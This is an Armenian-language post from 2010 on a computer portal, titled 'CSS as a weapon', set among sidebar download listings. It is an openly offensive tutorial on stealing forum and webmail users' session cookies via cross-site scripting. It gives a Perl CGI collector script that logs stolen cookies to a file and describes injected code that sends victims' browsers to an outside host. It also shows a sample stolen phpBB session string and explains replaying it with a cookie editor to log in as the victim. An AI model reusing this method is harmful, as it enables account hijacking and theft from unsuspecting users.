հինգշաբթի, 2020 Հոկ. 22, 21:55
ComputersԳլխավոր
Բարի գալուստ Հյուր
Բարի գալուստ
Ցանկ
Գովազդ
Վիճակագրություն
Մեկնաբանություններ: 69
Ֆորումներ: 102/508
Նկարներ: 77
Բլոգներ: 14
Նորություններ: 353
Բեռնումներ: 1074
Կայքադարան: 15
Խաղեր: 214
Հ.Տ.Հ: 64
Հյուրերի գիրք: 39


Ընդանուր: 1
Հյուր: 1
Անդամ: 0
Հայտարարություններ
  
Գլխավոր » 2010 » Փետրվար » 18 » CSS - ը որպես զենք
22:33
CSS - ը որպես զենք
Cross-site scripting (CSS/XSS)-ը հզոր գործիք է, որի միջոցով կարելի է անօրինական մուտք ստանալ ցանցային տարբեր ռեսուրսների նկատմամաբ` օտար էլ. արկղեր, ֆորումներ, չատեր և այլն: 
 
Որպեսզի օգտագործողը ամեն անգամ չհավաքի ծածկագիրը, երբ նա ֆորում է մտնում, ֆորումի ստեղծողները մտածել են հեղինակության հաստատման միջոց` օգտագործելով cookie –ները: Այսինքն` օգտագործողի ծածկանունից և ծածկագրից ստեղծվում է տեքստային փաստաթուղթ, որը տեղադրվում է C:\...\...\Cookies հասցեում: Երբ օգտագործողը միանում է ֆորումին, սկրիպտը ստուգում է տվյալ ֆայլի առկայյությունը նրա համակարգչում: Եթե ֆայլը կա, ապա օգտագործողը համարվում է ֆորումի օրինական օգտագործող:

եթե դու կարողանաս գողանալ այդ ֆայլի տվյալները և ուղարկես սերվեր, ապա նրանք քեզ կընդունեն որպես իրենց օրինական օգտագործողի: JavaScript –ը ունի այդպիսի հնարավորություն: 
 
Cooki-ների գողացման գործընթացը.
 
Առաջին հերթին պետք է ստեղծվի cgi սկրիպտ, որը կընդունի տվյալները cooki – ներից և այն կհիշի մի նոր ֆայլում: Այսպիսին է այդ սկրիպտի տեսքը պերլում:

#!/usr/bin/perl -w
# բացում ենք cookies.txt –ը ինֆորմացիայի ավելացման համար
open COOKIES,">>../cookies.txt";
print "Content-Type: text/html\n\n";
# ֆայլի մեջ ավելացնում ենք մի կետ, որի օգնությամբ 
# կարող ենք տեսնել, թե որտեղից են սկսվում գողացված տվյալները
print COOKIES "----------- new cookie -----------\n"; 
print COOKIES "$ENV{'QUERY_STRING'}\n";
# ավելացնում ենք կետ, որտեղ պետք է վերջանան գողացված տվյալները
print COOKIES "---------- end of cookie ---------\n\n";
# Փակում ենք cookies.txt – ֆայլը
close COOKIES;
 
Այս կոդը պետք է հիշվի cookie.cgi ֆայլում:
Առաջին քայլը կատարված է: Հիմա մենք ունենք սկրիպտը: Նրան կփոխանցվեն տվյալներ cookie –ից, որն էլ իր հերթին այդ տվյալները կավելացնի cookies.txt ֆայլում: Արդյունքում այս ֆայլում կկրկնօրինակվեն այն բոլոր օգտագործողների cookie-ները, որոնք կնայեն ֆորումը կամ կկարդան չատում այն հաղորդագրությունը, որը պարունակում է այդ սկրիպտը աշխատեցնող ինչ-որ կոդ: Այդ կոդի օրինակ է հանդիսանում

կոդը: Այս սկրիպտի իրականացման ընթացքում բրոուզերը redirect կկատարի http://something/cgi-bin/cookie.cgi հասցեում գտնվող սկրիպտը: 
 
Ֆորումից գողացված տեղեկությունները ունեն հետևյալ տեսքը.
b=b;%20hotlog=1;%20phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22471%22%3B%7D;%20phpbb2mysql_sid=a5cadcb43f68a1dcd64b9324f4e7162f;%20phpbb2mysql_t=a%3A3%3A%7Bi%3A742%3Bi%3A1075844973%3Bi%3A744%3Bi%3A1075845106%3Bi%3A745%3Bi%3A1075845231%3B%7D
Այս տվյալները մշակելու համար պետք է օգտագործել Cookie Editor ծրագիրը, որը վերցնելով այս տվյալները` կստեղծի cookie, որն էլ օգտագործելով հնարավոր կլինի մուտք գործել տվյալ ֆորումները և այլ տեղեր:
Դիտել են: 678 | Ավելացվել է: Admin
Բոլոր մեկնաբանությունները: 0
avatar
Գովազդ
Որոնում
Օրացույց
«  Փետրվար 2010  »
Երկ.Երք.Չոր.Հնգ.Ուրբ.Շաբ.Կիր.
1234567
891011121314
15161718192021
22232425262728
Լեզուն
Նորություններ
Վերջին ֆայլերը
[2013 Ապր. 26][Օպերացիոն համակարգեր]
Мультизагрузочная флешка v.6.0 IDimm Edition (2013/RUS) (0)
[2011 Սեպ. 10][Օպերացիոն համակարգեր]
Windows 7 Build 7601 (x86) SP1 (RTM) DE-EN-RU (02.09.2011) StaforceTEAM (0)
[2011 Սեպ. 10][Գրաֆիկա և ձևավորում]
Pearl Mountain Greeting Card Builder v3.0.1 build 2901 (0)
[2011 Սեպ. 10][Մուլտիմեդիա]
K-Lite Mega Codec v7.7.0 Portable1 (0)
[2011 Օգս. 29][Ինտերնետ և ցանցեր]
Skype 5.5.0.114(Latest Version) (0)
Հետաքրքիր կայքեր
  • www.IT-masters.info
  • Sport
  • www.armstar.ru
  • Մուտք
    Անտիվիրուս
    Գովազդ

    HSDN - Информационная полоска
    Copyright© 2009-2020 |Computers.do.am| All rights reserved

    Rambler's Top100